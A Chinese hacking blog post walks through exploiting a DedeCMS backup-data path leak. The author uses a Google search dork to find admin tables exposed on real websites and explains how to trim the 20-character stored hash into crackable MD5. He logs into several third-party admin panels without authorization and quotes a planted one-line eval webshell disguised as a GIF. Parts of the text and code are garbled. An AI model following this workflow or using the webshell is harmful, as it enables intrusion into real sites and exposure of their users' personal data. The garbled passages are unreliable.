危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2289 浏览18982134

小试DEDECMS备份数据路径泄露漏洞

一、Google搜索,获得admin与“MD5”

说到DEDECMS,恐怕大家都是非常熟悉了:织梦网站系统。据说安装使用量已经达到六七十万,目前的最高版本是V5.7。正所谓是“树大招风”,近几年DEDECMS被暴出漏洞的信息也是层出不穷,堪比“洞网”之“动网”。像以前被暴出的URL编解码漏洞,由于joblist.php、guestbook_admin.php等文件中未对orderby参数进行过滤,导致他人查询得到网站数据库的管理账号及密码等敏感信息(有专门的利用程序,可经过简单的几步操作就得到网站的WebShell;还有像V5.6版本的plus/advancedsearch.php任意sql语句执行漏洞、GBK SQL注入漏洞、嵌入恶意代码执行漏洞、RSSk入漏洞……就像Windows操作系统一样,漏洞多,说明其用户量大,大家是比较认可的。不过,漏洞一经暴出,使用DEDECMS的网站就非常危险了,官方要努力哈!下面,大家就跟随危险漫步一起来探一探这个“备份数据路径泄露”漏洞的深浅吧。

按照“大量DEDECMS站点备份数据路径泄露”一文的“最高指示”,我先用Google来搜索关键字“inurl:backupdata*dede_admin”,其中的“backupdaia”就是DEDECMS备份数据关键字。结果,0.07秒,Google非常给力地搜索到了313个结果,0.07秒,都是些“INSERT INTO dede admin”的形式。开始动手测试吧!结果第一个就失败,晕。点击第二个,360极速浏览器马上就打开了一个TXT文件,显示出对应的网站有三个admin账号:buffalo-2b53419ab95507cdf127、Test-bcd4621d373cade4e832和2pmy-12816df80376c6ec4cfC。

二、20位“伪MD5”与先行者“马迹”

粗心的我一开始并没有注意,直接复制“MD5”加密密码去破解,结果被提示“请确认是否是标准的MD5数据!”,晕。明明就是一串MD5加密密码啊,怎么会不是标准格式呢?仔细一数,乖乖,20位(标准的MD5密码是16位或32位)!还是问问Google大叔吧,原来,在保存织梦管理账号信息的dede_admin数据库表中,的确存储了20值的MD5密码,DEDECMS在这儿做了点儿小动作(具体代码自己查),而破解方法非常简单——去掉这个20位伪MD5密码的前三位和最后一位,剩下的就是标准的16位MD5加密密码了。也就是说,我们只须从第四位开始截取,一直到倒数第二位终止即可。

OK,再次开始MD5密码的破解,结果前两个都出来了,分别是chair和test,第三个是收费记录。还记得DEDECMS的默认后台么?直接在网站域名之后添加“/dede”,出现管理登录的界面;输入账号、密码和验证码,登录成功。WebShelI就不拿了吧(这不是撰写本文的主要目的),很意外地在“附件数据管理”中发现第一条记录不正常:文件标题是“a a”,文件大小是10,3K,上传时间是2016,02.22 '<13:14)。虽然文件类型显示是图片格式,但“aa”这样的-文件标题起得也太随意了吧,根本不像是管理员添加的,倒有八分像是上传的“小马”;时间也对,正好是该漏洞刚刚被暴后的第二天。是骡子是马,拉出来遛遛!

点击打开,呵呵,果然是个马!浏览器显示出了“GIF89a”文件头(上传内容为木马的伪图片文件以躲过系统对图片格式的检测;最后部分有一句“<%eval(request(0》%><%@ Page Language="Jscript”%><%eValfRLquest.ltem0unsafe);%>”则彻底说明了问题,很明显的“一句话木马”呀,登录密码就是“o”不用多说了,看来随后待检测的若1-DEDECMS网站会有不少中招者的,继续。

三、众多的“被暴”者与“落马”者

根据Google的搜索结果,危险漫步很快就得到了很多被暴出管理员账号与MD5密码的网站,简直是一暴一个准啊!其中,小菜也发现了不少根本不用破解的MD5密码,那就是传说中的“admin/admin”式,对应的MD5加密密码是“7a57a5a743894aOe”。值得一提的是,一些网站仍存在着非常低级的目录暴露漏洞,可以随意访问甚至下载到其它一些数据。比如有一个“xx人才网”,这个FTP不仅目录暴露出大量的MDF文件(SQL Server数据库文件),而且可以直接点击就下载,若干GB的账号信息啊,想必其中保存的是求职者真实姓名、身份证号码及联系方式等,想想就令人不寒而栗哈。  

就像上一步中遇到的那个先行者一样,危险漫步在之后的测试过程中同样也发现了不少“落马”者——要么挂马,要么上黑页,太不厚道了。看来,一个漏洞刚刚暴出时很快就会有下手的哈。另外,我还发现:中招的大多都是些整形医院、旅行社或一些企业网站,但其中竟然也有信息公司和网站建设服务者!看来都是一套模板惹的祸,悲剧啊!至于修补方法,找管网好了;不过,有人直接给出了一个模糊的修复方法——robot.txt做好限制,是否有效,自行验证。